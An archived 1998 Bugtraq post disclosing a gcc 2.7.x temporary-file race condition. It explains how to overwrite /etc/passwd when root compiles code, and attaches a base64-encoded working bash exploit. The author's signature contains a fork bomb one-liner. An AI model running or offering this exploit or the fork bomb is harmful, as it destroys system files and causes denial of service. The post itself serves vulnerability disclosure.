GCC 2.7.? /tmp files

From: Michał Zalewski (lcamtufat_private)
Date: Thu Jan 15 1998 - 13:46:06 PST

Next message: Angelos Karageorgiou: "Re: pnserver exploit.."

Previous message: Tim Newsham: "Re: DoS attack: apache (& other) .htaccess Authentication"
Next in thread: Michael Douglass: "Re: GCC 2.7.? /tmp files"
Reply: Michael Douglass: "Re: GCC 2.7.? /tmp files"
Reply: Niels Bakker: "Re: GCC 2.7.? /tmp files"
Reply: dichro-bugtraqat_private: "Re: GCC 2.7.? /tmp files"
Reply: Theo de Raadt: "Re: GCC 2.7.? /tmp files"
Reply: Perry E. Metzger: "Re: GCC 2.7.? /tmp files"
Reply: Zack Weinberg: "Re: GCC 2.7.? /tmp files"
Reply: John Gotts: "Re: GCC 2.7.? /tmp files"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a multi-part message in MIME format.

------=_NextPart_000_0005_01BD2207.5DF821A0
Content-Type: text/plain;
        charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable

During compilation, gcc uses following temporary files:

/tmp/ccXXXXXX.i
/tmp/ccXXXXXX.s
/tmp/ccXXXXXX.o

Where XXXXXX means a 'unique' random number. Unique, but not
quite. Only the first file (.i) is created properly, after a
detailed checks. But next one (.s) is created within a noticable
time interval using _extactly the same_ number and without performing
any checks (!). Finally, the last file (.o) is created again in the
same way, but '1' is appended to the sequence number.

Now, we may leave a script, which periodically checks /tmp looking
for cc*.i files. If any has been found, the script immediately
creates link to /etc/passwd (or another vital file) using sequence
number stripped from the .i file. Because no checks are performed by
gcc, if our script was fast enough, target file may be overwritten
when gcc has been launched by root! That's especially possible when
large sources (more than 20-50 kB?), are compiled.

I attached a simple and slow exploit. It works, but should become even
more effective when you rewrite it to C...

I've tested it under gcc 2.7.3.f.1

_______________________________________________________________________
Micha=B3 Zalewski [tel 9690] | finger 4 PGP =
[lcamtufat_private]
=3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] =
---------=3D

------=_NextPart_000_0005_01BD2207.5DF821A0
Content-Type: application/octet-stream;
        name="gcc-exploit"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="gcc-exploit"

IyEvYmluL2Jhc2gKCiMgU2ltcGxlIEdDQyBleHBsb2l0ICh0ZXN0ZWQgdW5kZXIgMi43LjMuZi4x
KQojIGJ5IE1pY2hhbCBaYWxld3NraSAobGNhbXR1ZkBzdGFzemljLndhdy5wbCkKIyAtLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFVzYWdlOiAic2NyZWVuIC4v
Z2NjX2xuIiB0aGVuIEN0cmwrQSxECiMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0KIyBVZ2gsIGJsYWguLi4gU2hvdWxkIGJlIHdyaXR0ZW4gaW4gQyBmb3IKIyBi
ZXR0ZXIgcGVyZm9ybWFuY2UsIGJ1dCBJIGhhdmUgbm8gdGltZSA6KQoKVklDVElNPS9ldGMvcGFz
c3dkCgplY2hvICJHQ0MgZXhwbG9pdCBsYXVuY2hlZC4uLiIKCnJlbmljZSArMjAgJFBQSUQgPiYv
ZGV2L251bGwKCmNkIC90bXAKCndoaWxlIFsgMSBdOyBkbwoKICBWPWBscyBjYyouaSAyPi9kZXYv
bnVsbHxjdXQgLWYgMSAtZCAiLiJgCiAgCiAgaWYgWyAhICIkViIgPSAiIiBdOyB0aGVuCiAgICBs
biAkVklDVElNICR7Vn0ucyA+Ji9kZXYvbnVsbAogICAgbG4gJFZJQ1RJTSAke1Z9MS5vID4mL2Rl
di9udWxsCiAgICBlY2hvICJBbSBJIGZhc3QgZW5vdWdoPyIKICBmaQoKZG9uZQo=

------=_NextPart_000_0005_01BD2207.5DF821A0--

Next message: Angelos Karageorgiou: "Re: pnserver exploit.."
Previous message: Tim Newsham: "Re: DoS attack: apache (& other) .htaccess Authentication"
Next in thread: Michael Douglass: "Re: GCC 2.7.? /tmp files"
Reply: Michael Douglass: "Re: GCC 2.7.? /tmp files"
Reply: Niels Bakker: "Re: GCC 2.7.? /tmp files"
Reply: dichro-bugtraqat_private: "Re: GCC 2.7.? /tmp files"
Reply: Theo de Raadt: "Re: GCC 2.7.? /tmp files"
Reply: Perry E. Metzger: "Re: GCC 2.7.? /tmp files"
Reply: Zack Weinberg: "Re: GCC 2.7.? /tmp files"
Reply: John Gotts: "Re: GCC 2.7.? /tmp files"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:39:35 PDT